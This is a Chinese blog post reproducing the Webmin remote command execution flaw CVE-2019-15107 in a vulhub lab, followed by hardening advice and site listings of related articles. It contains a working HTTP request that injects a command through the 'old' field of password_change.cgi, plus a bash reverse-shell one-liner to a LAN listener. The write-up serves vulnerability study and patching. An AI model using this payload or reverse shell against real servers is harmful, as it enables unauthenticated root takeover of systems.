Webmin 远程命令执行漏洞(CVE-2019-15107)

最新推荐文章于 2024-04-17 08:22:55 发布
最新推荐文章于 2024-04-17 08:22:55 发布
阅读量378 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57206390/article/details/134040834
版权

1、漏洞编号:

CVE-2019-15107

2、漏洞描述:

Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。

该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。

3、影响版本:

Webmin<=1.920

4、利用方法(利用案例):

(1)环境搭建

环境:webmin 1.910

使用docker搭建,在vulhub项目中有webmin漏洞复现的环境

(2)复现过程

进入https://your-ip:10000,输入任意账户名密码后直接点击登录并利用BP抓包

将如图所示的数据包发送Repeater模块

将数据包修改为下面的内容,然后发送出去

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

将传输字段改为密码修改所需的字段,即user=&old=&new1=&new2=,需注意这里的user不可以是系统用户root,也可以直接套用EXP,修改完如下图:

此时old字段中是id,获取到的是root用户权限

(3)深度利用

执行反弹shell(这里注意是要在同一个局域网下)

bash -c "bash -i >& /dev/tcp/192.168.137.100/4444 0>&1"

然后修改BP数据包,kali开启监听

kali成功监听到

5、附带文件:

利用Burp suit 抓包

6、加固建议:

(1)更新版本webmin

(2)临时修补方案,找到漏洞代码,将,qx/$in{‘old’}/)代码删除

(3)在github上下载password_change.cgi文件,打补丁

7、参考信息:

https://vulhub.org/#/environments/webmin/CVE-2019-15107/

8、漏洞分类:

远程命令执行漏洞

塵光
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现-webmin漏洞系列分析与利用
aming小老弟
05-18 2619
webmin远程命令执行漏洞目标简介漏洞描述漏洞利用条件:漏洞复现构造POC构造EXP漏洞分析被植入后门依据修复建议 目标简介 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。 使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 L
CVE-2022-0824 Webmin 远程代码执行漏洞复现
热爱学习,喜欢折腾!
10-11 2192
Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。
CVE-2024-36446 Webmin,【金九银十
最新发布
ccc6553584的博客
04-17 559
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。先下载 poc ,访问:https://github.com/p0dalirius/CVE-2022-36446-Webmin-Software-Package-Updates-RCE。
Webmin (CVE-2019-15107) 远程命令执行漏洞复现
来日可期的博客
10-13 764
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。访问https://127.0.0.1:10000/password_change.cgi。然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。还可以使用HackBar,发送POST请求包,并添加攻击Payload。访问靶场地址https://127.0.0.1:10000/漏洞影响版本为Webmin
webmin远程命令执行漏洞(CVE-2019-15107)
weixin_51387754的博客
10-22 2010
简介(what and why) Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 HOW:Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了
Webmin 远程代码执行CVE-2022-0824)漏洞搭建复现+攻击检测原理(流量分析)详细
m0_60884805的博客
09-19 3181
Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
wireshark抓包(Webmin 远程命令执行漏洞CVE-2019-15107))
10-12
wireshark抓包(Webmin 远程命令执行漏洞CVE-2019-15107))
CVE-2019-15107
05-23
CVE-2019-15107 Webmin(1.890-1.920)后门RCE漏洞的Python实现 基于针对相同漏洞利用的Metasploit模块( ) 漏洞利用大多是自动的。 请参阅./CVE-2019-15107.py --help以了解完整的开关范围 警告:此存储库中的...
PyKota Webmin Module:PyKota Webmin模块-开源
05-08
PyKota Webmin模块是专为Webmin设计的一款开源组件,其主要功能是提供对PyKota打印机计费服务器的配置和管理支持。在深入探讨这个模块之前,我们首先需要理解Webmin和PyKota的基本概念。 Webmin是一款强大的基于Web...
Webmin BIND 9 dynamic DNS module-开源
04-24
BIND 9动态DNS Webmin模块。 该模块支持静态和动态区域,以及在正向和反向区域中的IPv4和IPv6寻址。
漏洞复现------Webmin 远程命令执行漏洞CVE-2019-15107
Z_Grant的博客
09-23 7431
文章目录一,webmin简介二,漏洞概述三,漏洞复现(1)环境搭建(2)exp四,漏洞分析五,漏洞修复 一,webmin简介 什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一...
漏洞复现】Webmin 远程命令执行(CVE-2019-15107)
过期的秋刀鱼
11-05 475
1.900 到 1.920版本的用户,编辑Webmin配置文件:/etc/webmin/miniserv.conf,注释或删除“passwd_mode=”行,然后运行/etc/webmin/restart 重启服务命令。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。直接访问https://your-ip:10000/password_change.cgi。上面poc需要注意:ip改成自己的ip,然后user参数不能是系统账户,后面接执行命令
webmin漏洞复现集合
qq_69775412的博客
10-08 1739
webmin漏洞复现集合
CVE-2019-15107 webmin RCE漏洞复现
永远是少年
12-10 964
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-15107 webmin RCE漏洞复现。 一、CVE-2019-15107 webmin RCE漏洞简介与环境搭建 二、CVE-2019-15107 webmin RCE实战
CVE-2019-15107 Webmin远程命令执行漏洞复现
墨痕诉清风的博客
11-05 615
在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。根据最新消息,该应用在官方提供的sourceforge下载的源码才包含这个漏洞,而官方Github上的代码是安全的。在sourceforge上下载,链接如下。这里的user值要是用的是一个假的用户,使用真实的root测试不成功,只有在发送的用户参数的值不是已知的Linux用户的情况下(而参考链接中是user=root123),展示进入才会到修改/etc/shadow的地方,触发命令注入漏洞。查看response。.
CVE-2019-15107 Webmin远程命令执行漏洞复现 (文末EXP)
Vitaminapple的博客
06-03 1019
CVE-2019-15107 Webmin远程命令执行漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装 (1)安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun (2)安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y inst
Webmin命令执行(CVE-2020-35606)
m0_65150886的博客
01-31 355
WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。账户密码:root:password。使用前注意修改py文件中的121行的目标端口号和122行的监听端口号。://ip:port,出现如下页面,开始实验。3.下载exp,并修改文件内容。
漏洞复现-webmin-命令执行】vulfocus/webmin-cve_2019_15107
10-14 1809
webmin-命令执行】无需身份验证接口
cve-2015-20107漏洞修复
12-08
根据引用[1]和引用提供的信息,CVE-2019-15107webmin系统存在的RCE漏洞编号。为了修复该漏洞,需要升级webmin版本至1.930或以上。具体修复步骤如下: 1.登录webmin系统,进入“Webmin Configuration”页面。 2.在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值